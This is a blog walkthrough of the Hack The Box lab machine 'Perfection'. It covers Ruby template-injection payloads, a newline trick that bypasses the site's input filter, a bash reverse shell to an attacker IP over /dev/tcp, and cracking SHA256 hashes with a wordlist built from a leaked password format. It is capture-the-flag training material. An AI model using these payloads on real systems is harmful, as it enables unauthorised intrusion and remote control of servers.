Skip to main content
Secure The Throne

Perfection Walkthrough(Hack The Box)

·722 words·4 mins·
Easy Linux Hack the Box Hacking Walkthrough Web
Emp5r0R
Author
Emp5r0R
Lead By Curiosity
Tryhackme Streamline Icon: https://streamlinehq.comTryHackMe
Table of Contents

Reconnaissance && Enumeration
#

  • Nmap scan results:
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 80:e4:79:e8:59:28:df:95:2d:ad:57:4a:46:04:ea:70 (ECDSA)
|_  256 e9:ea:0c:1d:86:13:ed:95:a9:d0:0b:c8:22:e4:cf:e9 (ED25519)
80/tcp open  http    nginx
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-title: Weighted Grade Calculator
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.0 - 5.14
Uptime guess: 15.030 days (since Tue Dec 31 22:06:01 2024)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

  • I was hanging around the website to find anything interesting, I am not gonna lie the website is both basic and neat

    gif

  • After a while I foud this Weighted grade calculator interesting

    Pasted image 20250116004126.png

  • In the footer of the page it shows/exposes that the website powered by WEBrick 1.7.0. So I noted it down.

  • After some bunch of research I learnt that WEBrick uses Ruby to run. If I can recall I think there is even a module in ruby named Webrick. I’ll leave the details below

    View the attached Links

    Link-1
    Link-2
    Link-3

  • Like in python SSTI are possible for Ruby and as this a calculator it gives us more clue to work on that. So I jumped the gun

    gun

  • This article showcases the SSTI on a WEBrick made site, talk about being lucky, lol –> Link here

    lucky

  • This Medium article helped me a lot with payloads for the ruby SSTI and while I was testing It, I couldn’t get any valid results

    Pasted image 20250116005312.png

  • Below contains the example payloads for Ruby. These are some of the payloads that I used for SSTI

<%= system("whoami") %>  
<%= Dir.entries('/') %>  
<%= File.open('/example/arbitrary-file').read %>

Exploitation
#

  • Some payload worked after little tweaks, But blocked by the web page as Malicious Input anyway. Hey atleast we got something
    Pasted image 20250116005529.png
  • No matter how I URL encode, it didn’t even worked. Probably the site blocks the symbols in the payload hmm…
    thinking
  • I learnt that URL encoded value of new-line(%0a) helps in bypassing SSTI validation So I used that before the payload as prefix and like a magic it worked
  • The whoami doesn’t return any output
    Pasted image 20250116010747.png
  • I tried hitting my machine for a check, and I got the request
    Pasted image 20250116010907.png
  • Request:
    Pasted image 20250116010943.png
  • As everything works fine its time for us to brew the cursed reverse shell payload
    brewing
%0a<%25%3d+system("bash+-c+'exec+bash+-i+%26>/dev/tcp/10.10.14.10/7001+<%261'")+%25>
  • It worked and we are as user susan now
  • Secured
    User flag
    Pasted image 20250116011350.png

Privilege Escalation
#

  • While enumerating I found two other folders wihin user susan's home directory
    Pasted image 20250116015043.png
  • Migration folder had sqlite database file so for a change I opened the file in the target system itself
  • The database had only one table called users . Inside that table, password hashes for five users were included
    Pasted image 20250116015454.png
  • The hashes were made from using sha256 algorithm
    Pasted image 20250116015710.png
  • I tried cracking the hashes using my tool BananaCracker(Previously sha256_cracker), But it failed
    Pasted image 20250116020022.png
  • Then, I started enumerating system further for privesc vectors and rather I found this /var/mail
  • Inside /var/mail/susan the message reads
Due to our transition to Jupiter Grades because of the PupilPath data breach, I thought we should also migrate our credentials ('our' including the other students

in our class) to the new platform. I also suggest a new password specification, to make things easier for everyone. The password format is:

{firstname}_{firstname backwards}_{randomly generated integer between 1 and 1,000,000,000}

Note that all letters of the first name should be convered into lowercase.

Please hit me with updates on the migration when you can. I am currently registering our university with the platform.
  • As per the instructions I created a python script to make password list for user susan
output_file = "susan_nasus_password.txt"

with open(output_file, "w") as file:
    for number in range(1, 1_000_000_001):
        file.write(f"susan_nasus_{number}\n")

print(f"File '{output_file}' has been successfully created.")
  • This would be both easy and fast when using bash
for ((i=1; i<=1000000000; i++)); do echo "susan_nasus_$i" >> "$output_file"
  • With the new wordlists I fired up my tool again and got the password
    Pasted image 20250116020736.png
  • You can get my tool from here BananaCracker(Previously known as sha256_cracker). More features will be added by the time of your visit
    mine
  • Using the password I logged in via SSH as user susan
  • I really wasn’t expecting this twist I was hoping for more steps, anyway I am glad. See this yourself lol
  • User susan can run sudo without any password
    are-we-a-joke
    Pasted image 20250116021417.png
  • Got the
    Root flag
    Pasted image 20250116021446.png

bye

Related

Backend Walkthrough(Hack The Box)
·1253 words·6 mins
Medium Linux Hack the Box Hacking Walkthrough Web
Caption Walkthrough(Hack The Box)
·1224 words·6 mins
Hard Linux Hack the Box Hacking Walkthrough Web
Forest Walkthrough(Hack The Box)
·1940 words·10 mins
Easy Windows Hack the Box Hacking Active Directory Walkthrough